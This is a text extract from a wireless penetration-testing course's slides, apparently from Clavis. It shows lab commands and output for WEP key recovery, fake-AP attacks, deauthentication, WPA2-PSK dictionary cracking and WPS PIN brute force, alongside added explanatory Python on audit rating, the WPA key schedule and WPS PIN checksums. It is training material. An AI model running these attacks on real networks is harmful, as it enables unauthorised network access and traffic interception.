   1  00:07:40:4D:1A:5C  LABVIRUS                  WEP (40296 IVs)

Page 88

# tcpdump -vvv -n -r labvirus-01.cap
16:24:28.546838 0us Beacon (LABVIRUS) [1.0* 2.0* 5.5* 11.0* Mbit] ESS CH: 11, PRIVACY[|802.11]
16:24:29.251394 104us Clear-To-Send RA:c8:bc:c8:20:38:5c
16:24:29.251398 0us Acknowledgment RA:c8:bc:c8:20:38:5c
16:24:29.251910 0us Acknowledgment RA:00:1c:b3:af:ae:1e
16:24:29.259072 90us Request-To-Send TA:c8:bc:c8:20:38:5c
16:24:29.259080 46us Clear-To-Send RA:c8:bc:c8:20:38:5c
16:24:29.259586 90us Request-To-Send TA:c8:bc:c8:20:38:5c
16:24:29.259594 46us Clear-To-Send RA:c8:bc:c8:20:38:5c
16:24:29.396292 90us Request-To-Send TA:c8:bc:c8:20:38:5c

Page 89

# airdecap-ng -w 6E616FXXXXXXXXXX -e LABVIRUS labvirus-01.cap
Total number of packets read        298278
Total number of WEP data packets    162412
Total number of WPA data packets         0
Number of plaintext data packets         0
Number of decrypted WEP packets     108781
Number of corrupted WEP packets          0
Number of decrypted WPA packets          0

Page 90

16:24:43.166932 IP 192.168.11.1.1900 > 239.255.255.250.1900: UDP, length 272
16:24:43.170518 IP 192.168.11.1.1900 > 239.255.255.250.1900: UDP, length 335
16:24:43.173590 IP 192.168.11.1.1900 > 239.255.255.250.1900: UDP, length 327
16:24:43.176662 IP 192.168.11.1.1900 > 239.255.255.250.1900: UDP, length 272
16:24:43.181784 IP 192.168.11.1.1900 > 239.255.255.250.1900: UDP, length 311
16:24:43.187416 IP 192.168.11.1.1900 > 239.255.255.250.1900: UDP, length 343
16:24:43.190486 IP 192.168.11.1.1900 > 239.255.255.250.1900: UDP, length 272
16:24:43.193558 IP 192.168.11.1.1900 > 239.255.255.250.1900: UDP, length 331
16:24:43.197654 IP 192.168.11.1.1900 > 239.255.255.250.1900: UDP, length 337
16:24:43.201748 IP 192.168.11.1.1900 > 239.255.255.250.1900: UDP, length 325
16:24:43.204822 IP 192.168.11.1.1900 > 239.255.255.250.1900: UDP, length 331
16:25:05.057281 IP 0.0.0.0.bootpc > 255.255.255.255.bootps: BOOTP/DHCP, Request from 00:21:29:65:b8:45 (oui Unknown), length 300
16:25:05.060444 IP 192.168.11.1.bootps > 192.168.11.2.bootpc: BOOTP/DHCP, Reply, length 300
16:25:05.075290 IP 0.0.0.0.bootpc > 255.255.255.255.bootps: BOOTP/DHCP, Request from 00:21:29:65:b8:45 (oui Unknown), length 300

Page 91

 CH 11 ][ Elapsed: 4 s ][ 2012-02-27 21:14

 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
 2E:74:C2:BA:A5:8A  -87        2        0    0   3  54e  WPA2 CCMP   PSK  iPhone de Marcelo
 00:25:9C:36:0A:EF  -45        3        0    0   1  54   WPA2 CCMP   PSK  Homenet54

 BSSID              STATION            PWR   Rate    Lost  Frames  Probe
 (not associated)   00:1B:77:7C:2C:A7  -86    0 - 1     68       8  Notebook
 (not associated)   00:21:29:65:B8:45  -47    0 - 1      7       2  LABVIRUS

Page 92

Wired Equivalent Privacy

Page 93

Wired Equivalent Privacy

 CH  4 ][ Elapsed: 28 s ][ 2012-02-28 07:59

 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
 00:26:CB:11:5F:30  -64       16        0    0  11  54e. WPA2 CCMP   MGT  88200W
 00:1C:10:AE:B6:8F  -68       20        0    0   6  54   OPN              linksys
 74:EA:3A:CF:13:7C  -70       15        2    0  11  54 . WPA2 CCMP   PSK  LABVIRUS
 00:E0:FC:4D:27:49  -79        0        0    0  11  54   WPA2 TKIP   PSK  Pessoal

 BSSID              STATION            PWR   Rate    Lost  Frames  Probe
 (not associated)   DC:2B:61:33:2B:6C  -53    0 - 1      0      12  Boingo Hotspot,EuroYouthHotel,hostalparis3,RYANS-PARADIS-W
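Added example, not from the course slides or from the aircrack-ng project: an audit script over the kind of listing shown above (and again on the WPA slide later on). airodump-ng run with `-w <prefix>` also writes `<prefix>-01.csv`; the Python below parses that file's two tables, rates each AP from its ENC/CIPHER/AUTH columns (OPN and WEP critical, TKIP high, WPA1 medium, WPA2-PSK low, WPA2 with 802.1X informational) and lists stations whose probe requests name the networks they know, like the station on this slide that advertises four hotel and hotspot names. `SAMPLE_CSV` is constructed by hand in that file's layout from this slide's rows plus the WEP row of the earlier LABVIRUS listing; timestamps are invented and the function names are this example's own.

```python
"""Added example (not from the course slides or aircrack-ng): rate the APs and
clients in an airodump-ng CSV export."""

SEVERITY_ORDER = ["critical", "high", "medium", "low", "info"]

# Constructed in the layout of <prefix>-01.csv: an AP table, a blank line, a
# station table. Rows taken from the slide listings; timestamps invented.
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:26:CB:11:5F:30, 2012-02-28 07:59:01, 2012-02-28 07:59:29, 11, 54, WPA2, CCMP, MGT, -64, 16, 0, 0. 0. 0. 0, 6, 88200W,
00:1C:10:AE:B6:8F, 2012-02-28 07:59:01, 2012-02-28 07:59:29, 6, 54, OPN, , , -68, 20, 0, 0. 0. 0. 0, 7, linksys,
74:EA:3A:CF:13:7C, 2012-02-28 07:59:02, 2012-02-28 07:59:29, 11, 54, WPA2, CCMP, PSK, -70, 15, 2, 0. 0. 0. 0, 8, LABVIRUS,
00:E0:FC:4D:27:49, 2012-02-28 07:59:05, 2012-02-28 07:59:20, 11, 54, WPA2, TKIP, PSK, -79, 0, 0, 0. 0. 0. 0, 7, Pessoal,
00:07:40:4D:1A:5C, 2012-02-20 11:06:00, 2012-02-20 11:06:30, 11, 54, WEP, WEP, , -39, 3, 17, 0. 0. 0. 0, 8, LABVIRUS,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
DC:2B:61:33:2B:6C, 2012-02-28 07:59:01, 2012-02-28 07:59:29, -53, 12, (not associated), Boingo Hotspot,EuroYouthHotel,hostalparis3,RYANS-PARADIS-W
00:21:29:65:B8:45, 2012-02-20 11:06:00, 2012-02-20 11:06:30, 0, 20, 00:07:40:4D:1A:5C,
"""


def parse_airodump_csv(text: str):
    """Split the export into its AP table and its station table.
    Returns (aps, stations); each AP is a dict keyed by the header names."""
    ap_part, _, sta_part = text.strip().partition("\n\n")
    ap_lines = [l for l in ap_part.splitlines() if l.strip()]
    header = [h.strip() for h in ap_lines[0].split(",")]
    aps = [dict(zip(header, (f.strip() for f in line.split(","))))
           for line in ap_lines[1:]]
    stations = []
    for line in sta_part.splitlines()[1:]:           # [0] is the station header
        if not line.strip():
            continue
        # The probed-ESSID list is itself comma separated, so split only the
        # six leading fields and keep the remainder whole.
        parts = [f.strip() for f in line.split(",", 6)]
        probed = [p.strip() for p in parts[6].split(",") if p.strip()] if len(parts) == 7 else []
        stations.append({"mac": parts[0], "bssid": parts[5], "probed": probed})
    return aps, stations


def rate_ap(privacy: str, cipher: str, auth: str):
    """Map airodump's ENC/CIPHER/AUTH columns to (severity, reason). airodump
    prints several tokens when an AP accepts several modes ("WPA2 WPA",
    "CCMP TKIP"), so check tokens rather than whole strings."""
    p, c = privacy.split(), cipher.split()
    if "OPN" in p:
        return "critical", "open network: all traffic readable by anyone in range"
    if "WEP" in p:
        return "critical", "WEP: key recoverable from captured traffic (see the aircrack-ng slides)"
    if "TKIP" in c:
        return "high", "TKIP accepted: deprecated WPA1-era cipher"
    if "WPA" in p:
        return "medium", "WPA1 accepted (alone or alongside WPA2)"
    if auth == "PSK":
        return "low", "WPA2-PSK: security rests on the passphrase; the 4-way handshake can be captured and guessed offline"
    if auth == "MGT":
        return "info", "WPA2/CCMP with 802.1X (RADIUS) authentication"
    return "info", f"unrecognised combination {privacy}/{cipher}/{auth}"


def audit(text: str) -> dict:
    aps, stations = parse_airodump_csv(text)
    findings = []
    for ap in aps:
        sev, why = rate_ap(ap["Privacy"], ap["Cipher"], ap["Authentication"])
        findings.append({"bssid": ap["BSSID"], "essid": ap["ESSID"],
                         "channel": ap["channel"], "severity": sev, "reason": why})
    findings.sort(key=lambda f: SEVERITY_ORDER.index(f["severity"]))
    # A client probing for named networks tells everyone in range which
    # networks it trusts and will join without being asked.
    leaky = {s["mac"]: s["probed"] for s in stations if s["probed"]}
    return {"aps": findings, "leaky_clients": leaky}


if __name__ == "__main__":
    report = audit(SAMPLE_CSV)
    for f in report["aps"]:
        print(f"[{f['severity']:8}] {f['bssid']} ch{f['channel']:>3} {f['essid']!r}: {f['reason']}")
    for mac, names in report["leaky_clients"].items():
        print(f"[leak    ] {mac} probes for: {', '.join(names)}")
```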

Page 94

Wired Equivalent Privacy

# airbase-ng -N --essid LABVIRUS -c 1 -v -W 1 mon0
09:57:07  Created tap interface at0
09:57:07  Trying to set MTU on at0 to 1500
09:57:07  Access Point with BSSID 00:21:29:65:B8:45 started.
09:57:09  Got broadcast probe request from 34:15:9E:E3:97:A7
09:57:09  Got broadcast probe request from 34:15:9E:E3:97:A7
09:57:09  Got directed probe request from E0:F8:47:C3:30:14 - "LABVIRUS"
09:57:09  Got directed probe request from E0:F8:47:C3:30:14 - "LABVIRUS"
09:57:10  Got an auth request from E0:F8:47:C3:30:14 (shared key)
09:57:10  Broken SKA: E0:F8:47:C3:30:14 (expected: 151, got 32 bytes)
09:57:10  SKA from E0:F8:47:C3:30:14
09:57:10  Client E0:F8:47:C3:30:14 associated (WEP) to ESSID: "LABVIRUS"
09:57:10  Ignored IPv6 packet.
09:57:10  Starting Hirte attack against E0:F8:47:C3:30:14 at 100 pps.
09:57:10  Added ARP packet to cfrag buffer.

Page 95

Wired Equivalent Privacy

# airodump-ng --bssid 00:21:29:65:B8:45 -w cafe-latte -c 1 mon0
# aircrack-ng cafe-latte-01.cap

                                 Aircrack-ng 1.1 r2076

                 [00:00:00] Tested 798 keys (got 38085 IVs)

   KB    depth   byte(vote)
    0    0/  1   6E(56064) 15(45824) 3D(45312) AA(44800) 4A(44288)
    1    0/  9   61(53760) 44(46336) 98(45568) 0E(44800) C4(44800)
    2   33/  2   AE(41728) 18(41472) 6C(41472) 6F(41472) A1(41472)
    3    7/  3   F0(43776) 70(43264) B4(43264) 62(43008) 50(42752)
    4    0/  2   B8(56576) CD(46848) 94(46080) C9(45056) 3F(44800)

             KEY FOUND! [ 6E:61:6F:XX:XX:XX:XX:XX:XX:XX:XX:XX ] (ASCII: naoxxxxxxxxxxx )
        Decrypted correctly: 100%

Page 96

AP without clients

Page 97

AP without clients

Page 98

AP without clients

Page 99

AP without clients

Page 100

AP without clients

Page 101

AP without clients

Page 102

AP without clients

Page 103

AP without clients

Page 104

AP without clients

Page 105

Migration WPA-WEP

Page 106

Migration WPA-WEP

Page 107

Migration WPA-WEP

Page 108

Migration WPA-WEP

Page 109

Migration WPA-WEP

Page 110

Wired Equivalent Privacy

Page 111: Clavis Teste de Invasao Sem Fio EAD

WPA

CH 5 ][ Elapsed: 3 mins ][ 2012-02-22 05:45 BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 00:26:CB:11:5F:30 -64 66 1 0 11 54e. WPA2 CCMP MGT 88200Wireless-d 00:26:CB:B9:23:40 -77 68 0 0 6 54e. WPA2 CCMP MGT 88200Wireless-d 00:26:CB:C4:BD:90 -81 66 0 0 6 54e. WPA2 CCMP MGT 88200Wireless-d 94:0C:6D:BB:2C:94 -89 23 0 0 6 11 . WPA2 CCMP PSK Testeee 00:14:D1:C7:BD:00 -90 51 7 0 11 54e OPN AER 5 andar 00:26:CB:B9:24:C0 -82 17 0 0 1 54e. WPA2 CCMP MGT 88200Wireless-d 00:26:CB:C4:BA:00 -90 9 0 0 11 54e. WPA2 CCMP MGT 88200Wireless-d

Page 112: Clavis Teste de Invasao Sem Fio EAD

airodump-ng -w labvirus_wpa -c 11 --bssid 00:07:40:4D:1a:5c mon0

 CH 11 ][ Elapsed: 12 s ][ 2012-03-01 14:06

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 00:07:40:4D:1A:5C  -45  61       76       25    1  11  54   WPA  CCMP   PSK  LABVIRUS

 BSSID              STATION            PWR   Rate   Lost  Frames  Probe

 00:07:40:4D:1A:5C  00:26:5A:74:15:28  -25   54 - 5     8      26

Page 113: Clavis Teste de Invasao Sem Fio EAD

aircrack-ng labvirus_wpa-01.cap
Opening labvirus_wpa-01.cap
Read 254839 packets.

   #  BSSID              ESSID                     Encryption

   1  00:07:40:4D:1A:5C  LABVIRUS                  WPA (0 handshake)

Page 114: Clavis Teste de Invasao Sem Fio EAD

aircrack-ng labvirus_wpa-01.cap
Opening labvirus_wpa-01.cap
Read 698 packets.

   #  BSSID              ESSID                     Encryption

   1  00:07:40:4D:1A:5C  LABVIRUS                  WPA (1 handshake)

Choosing first network as target.

Opening labvirus_wpa-01.cap
Please specify a dictionary (option -w).

Page 115: Clavis Teste de Invasao Sem Fio EAD

tshark -r dlink-01.cap -R eapol

39965 377.079356 D-Link_50:2f:2e -> D-Link_74:15:28 EAPOL 131 Key (msg 1/4)
39968 377.086048 D-Link_74:15:28 -> D-Link_50:2f:2e EAPOL 160 Key (msg 2/4)
39969 377.089080 D-Link_50:2f:2e -> D-Link_74:15:28 EAPOL 187 Key (msg 3/4)
39971 377.104480 D-Link_74:15:28 -> D-Link_50:2f:2e EAPOL 136 Key (msg 4/4)

Page 116: Clavis Teste de Invasao Sem Fio EAD

aireplay-ng --deauth 100 -c 00:26:5A:74:15:28 -e dlink mon0
08:49:22  Waiting for beacon frame (ESSID: dlink) on channel 6
Found BSSID "00:1B:11:50:2F:2E" to given ESSID "dlink".
08:49:22  Sending 64 directed DeAuth. STMAC: [00:26:5A:74:15:28] [ 0|63 ACKs]

Page 117: Clavis Teste de Invasao Sem Fio EAD

wpa_supplicant -Dwext -iwlan4 -c/etc/wpa_supplicant/wpa.conf
Trying to associate with 00:1b:11:50:2f:2e (SSID='dlink' freq=2437 MHz)
Associated with 00:1b:11:50:2f:2e
WPA: Key negotiation completed with 00:1b:11:50:2f:2e [PTK=CCMP GTK=CCMP]
CTRL-EVENT-CONNECTED - Connection to 00:1b:11:50:2f:2e completed (auth) [id=1 id_str=]
CTRL-EVENT-DISCONNECTED - Disconnect event - remove keys

Page 118: Clavis Teste de Invasao Sem Fio EAD

aircrack-ng dlink-01.cap
Opening dlink-01.cap
Read 60093 packets.

   #  BSSID              ESSID                     Encryption

   1  00:1B:11:50:2F:2E  dlink                     WPA (1 handshake)

Page 119: Clavis Teste de Invasao Sem Fio EAD

time aircrack-ng -w popular_ptBR.dic dlink-01.cap

                                 Aircrack-ng 1.1

                   [00:01:09] 88192 keys tested (1274.66 k/s)

                         KEY FOUND! [ pxxxxxxxxxxxxxxxx ]

      Master Key     : E3 C5 0B 41 F1 8B 96 00 4B E1 AF F8 D9 67 0F 1F
                       D4 63 BA F0 0B 8A 2C 55 5F DD 5F 58 21 03 CE E4

      Transient Key  : 00 C8 D3 4D C1 7A 8B D5 57 3C FB 5B 86 D5 56 09
                       57 FA 29 9E 1E 2D A3 27 C1 19 07 4F 76 0C 25 57
                       A8 E8 F0 69 14 DE F7 18 FE EB 41 55 A4 17 87 CC
                       01 F9 F9 A4 87 95 C7 1C 90 BD 12 B4 CC 63 9A C3

      EAPOL HMAC     : 17 4A DB 11 5A AE 52 D6 CF E6 E4 2A 96 1D FB D2

real    1m9.538s
user    4m18.786s
sys     0m0.629s

Page 120: Clavis Teste de Invasao Sem Fio EAD

time genpmk -f 234k_pt-br_popular.dic -d dlink234.pmk -s dlink
[...]
109216 passphrases tested in 542.98 seconds:  201.14 passphrases/second

real    9m2.988s
user    9m2.468s
sys     0m0.414s

Page 121: Clavis Teste de Invasao Sem Fio EAD

time genpmk -f popular.dic -d dlink234.pmk -s dlink
[...]
109216 passphrases tested in 542.98 seconds:  201.14 passphrases/second

real    9m2.988s
user    9m2.468s
sys     0m0.414s

time pyrit -i popular.dic -o dlink.pmk -e dlink passthrough
Pyrit 0.4.1-dev (svn r308) (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+

Computed 109216 PMKs total; 1865 PMKs per second

real    1m20.753s
user    5m2.437s
sys     0m0.753s

Cowpatty

Page 122: Clavis Teste de Invasao Sem Fio EAD

cowpatty -d dlinkpop.pmk -s dlink -r dlink-01.cap
cowpatty 4.6 - WPA-PSK dictionary attack. <[email protected]>

Collected all necessary data to mount crack against WPA2/PSK passphrase.
Starting dictionary attack.  Please be patient.
key no. 10000: 22222222
key no. 20000: 93833104
key no. 30000: And48560
key no. 40000: Cib00043
key no. 50000: enqetm17
key no. 60000: hamdan00
key no. 70000: liberta10
key no. 80000: Mil08187

The PSK is "pxxxxxxxxxxxxxxxxxx".

89038 passphrases tested in 0.68 seconds:  130724.27 passphrases/second

Cowpatty

Page 123: Clavis Teste de Invasao Sem Fio EAD

time pyrit -r dlink-01.cap -i t-br_popular.dic attack_passthrough
Pyrit 0.4.1-dev (svn r308) (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+

Parsing file 'dlink-01.cap' (1/1)... Parsed 19 packets (19 802.11-packets), got 1 AP(s)

Picked AccessPoint 00:1b:11:50:2f:2e ('dlink') automatically.
Tried 109216 PMKs so far; 1870 PMKs per second.

The password is 'pxxxxxxxxxxxxx'.

real    1m21.027s
user    5m5.224s
sys     0m0.724s

Pyrit

Page 124: Clavis Teste de Invasao Sem Fio EAD

Pyrit

pyrit benchmark
Pyrit 0.4.1-dev (svn r308) (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+

Running benchmark (1239.9 PMKs/s)... \

Computed 1239.93 PMKs/s total.
#1: 'CPU-Core (SSE2)': 331.4 PMKs/s (RTT 3.0)
#2: 'CPU-Core (SSE2)': 332.1 PMKs/s (RTT 3.1)
#3: 'CPU-Core (SSE2)': 331.7 PMKs/s (RTT 3.0)
#4: 'CPU-Core (SSE2)': 331.3 PMKs/s (RTT 3.1)

Page 125: Clavis Teste de Invasao Sem Fio EAD

Pyrit

pyrit benchmark
Pyrit 0.4.1-dev (svn r308) (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+

Running benchmark (1880.5 PMKs/s)... /

Computed 1880.52 PMKs/s total.
#1: 'CUDA-Device #1 'GeForce 320M'': 1588.4 PMKs/s (RTT 2.7)
#2: 'CPU-Core (SSE2)': 361.3 PMKs/s (RTT 2.9)
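The WPA2-PSK key schedule that every tool on pages 114 to 125 recomputes per dictionary entry, as an added example written for this page (it is not code from the slides, aircrack-ng, pyrit or cowpatty). It shows why the tools refuse to run without a captured handshake, why a genpmk/pyrit table built with -s dlink is useless against any other SSID, and which fields the 'EAPOL HMAC' line corresponds to. The passphrase, nonces and EAPOL frame are constructed; only the two MAC addresses are taken from the page.

```python
import hashlib
import hmac

# Added example for this page (not code from the slides, aircrack-ng, pyrit or
# cowpatty): the 802.11i key schedule that each tool above recomputes per
# candidate passphrase. Every sample value below is constructed.

def pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 iterations, 32 bytes). The SSID
    is the salt, so a genpmk/pyrit table made with -s dlink only fits networks named dlink."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)

def ptk(pmk_bytes: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PRF-512: 64 bytes whose first 16 are the KCK that keys the EAPOL MIC. The MACs
    and nonces are read from handshake messages 1 and 2, which is why a capture is needed."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return b"".join(hmac.new(pmk_bytes, b"Pairwise key expansion\x00" + data + bytes([i]),
                             hashlib.sha1).digest() for i in range(4))[:64]

MIC_OFF = 4 + 77  # EAPOL header plus the key fields that precede the 16-byte MIC

def eapol_mic(kck: bytes, frame: bytes) -> bytes:
    """HMAC-SHA1-128 over the EAPOL-Key frame with the MIC field zeroed (CCMP suites);
    this is the 'EAPOL HMAC' aircrack-ng prints when the key is found."""
    zeroed = frame[:MIC_OFF] + b"\x00" * 16 + frame[MIC_OFF + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]

def candidate_matches(candidate, ssid, aa, spa, anonce, snonce, msg2: bytes) -> bool:
    """True when the candidate passphrase reproduces the MIC of message 2/4."""
    kck = ptk(pmk(candidate, ssid), aa, spa, anonce, snonce)[:16]
    return hmac.compare_digest(eapol_mic(kck, msg2), msg2[MIC_OFF:MIC_OFF + 16])

def build_msg2(kck: bytes, snonce: bytes) -> bytes:
    """Constructed EAPOL-Key message 2/4: descriptor type 2, key info 0x010a, key
    length 16, zero replay counter/IV/RSC/ID, empty key data, MIC filled in last."""
    body = b"\x02\x01\x0a\x00\x10" + b"\x00" * 8 + snonce + b"\x00" * 32 + b"\x00" * 16 + b"\x00\x00"
    frame = b"\x01\x03" + len(body).to_bytes(2, "big") + body
    return frame[:MIC_OFF] + eapol_mic(kck, frame) + frame[MIC_OFF + 16:]

def demo() -> tuple:
    """Handshake for SSID 'dlink' built from a constructed passphrase; returns
    (correct candidate accepted, wrong candidate accepted)."""
    aa, spa = bytes.fromhex("001b11502f2e"), bytes.fromhex("00265a741528")  # MACs from the page
    anonce, snonce = bytes(range(32)), bytes(range(32, 64))  # constructed nonces
    kck = ptk(pmk("constructed-pass-2013", "dlink"), aa, spa, anonce, snonce)[:16]
    msg2 = build_msg2(kck, snonce)
    ok = candidate_matches("constructed-pass-2013", "dlink", aa, spa, anonce, snonce, msg2)
    bad = candidate_matches("constructed-pass-2014", "dlink", aa, spa, anonce, snonce, msg2)
    return ok, bad
```

The 4096 PBKDF2 iterations are the whole cost of each guess, which is the rate pyrit reports as PMKs/s; a long random passphrase and a non-default SSID are the two settings that keep both the dictionary and the precomputed-table approach out of reach.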

Page 126: Clavis Teste de Invasao Sem Fio EAD

Attack on WPS

Page 127: Clavis Teste de Invasao Sem Fio EAD

Attack on WPS

[Diagram: WiFi Protected Setup. Labels: Recover configuration, Reconfigure AP, Registrar, PIN, PIN]

Page 128: Clavis Teste de Invasao Sem Fio EAD

# wash -i mon0

Wash v1.4 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>

BSSID               Channel   RSSI   WPS Version   WPS Locked   ESSID
---------------------------------------------------------------------------------
48:5B:39:B0:2D:2C   3         -54    1.0           No           LABVIRUS

Page 129: Clavis Teste de Invasao Sem Fio EAD

# reaver -i mon0 -b 48:5B:39:B0:D0:2C -v

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>

[+] Waiting for beacon from 48:5B:39:B0:D0:2C
[+] Associated with 48:5B:39:B0:D0:2C (ESSID: LABVIRUS)
[+] Trying pin 12345670
[+] WPS PIN: '12345670'
[+] WPA PSK: 'labvirus2013'
[+] AP SSID: 'LABVIRUS'
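Why the PIN search shown above finishes at all, as an added example written for this page (not code from the slides, reaver or wash): a WPS PIN is eight digits whose last digit is a checksum of the first seven, and the AP's reply to M4 reveals whether the first four digits are right before its reply to M6 reveals anything about the last three. The "WPS Locked" column that wash prints is the AP-side lockout that throttles this; turning off PIN-based external registration removes the exposure.

```python
# Added example for this page, not code from the slides or from reaver/wash.

def wps_checksum(first7: int) -> int:
    """Checksum digit the WPS specification appends to the 7-digit PIN body."""
    acc, n = 0, first7
    while n:
        acc += 3 * (n % 10)
        n //= 10
        acc += n % 10
        n //= 10
    return (10 - acc % 10) % 10

def is_valid_wps_pin(pin: str) -> bool:
    """True for a well-formed 8-digit PIN whose checksum digit is correct
    (the page's 12345670 passes; 12345678 does not)."""
    if len(pin) != 8 or not pin.isdigit():
        return False
    return wps_checksum(int(pin[:7])) == int(pin[7])

def pins_with_first_half(first4: str) -> list:
    """Every valid PIN sharing a given first half. There are only 1000, because
    the eighth digit is fixed by the checksum; once the AP has confirmed the
    first half, this list is the entire remaining search space."""
    pins = []
    for rest in range(1000):
        body = f"{first4}{rest:03d}"
        pins.append(body + str(wps_checksum(int(body))))
    return pins
```

Ten thousand first halves plus one thousand second halves bound the whole exchange at 11000 registrar attempts, against ten million for a PIN that could only be checked as a whole.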

Page 130: Clavis Teste de Invasao Sem Fio EAD

Doubts?

Questions?

Criticism?

Suggestions?

Page 131: Clavis Teste de Invasao Sem Fio EAD

Follow Clavis

http://clav.is/slideshare http://clav.is/twitter http://clav.is/facebook

Page 132: Clavis Teste de Invasao Sem Fio EAD

Thank you very much!

[email protected]  

[email protected]  

Nelson Murilo Clavis Segurança da Informação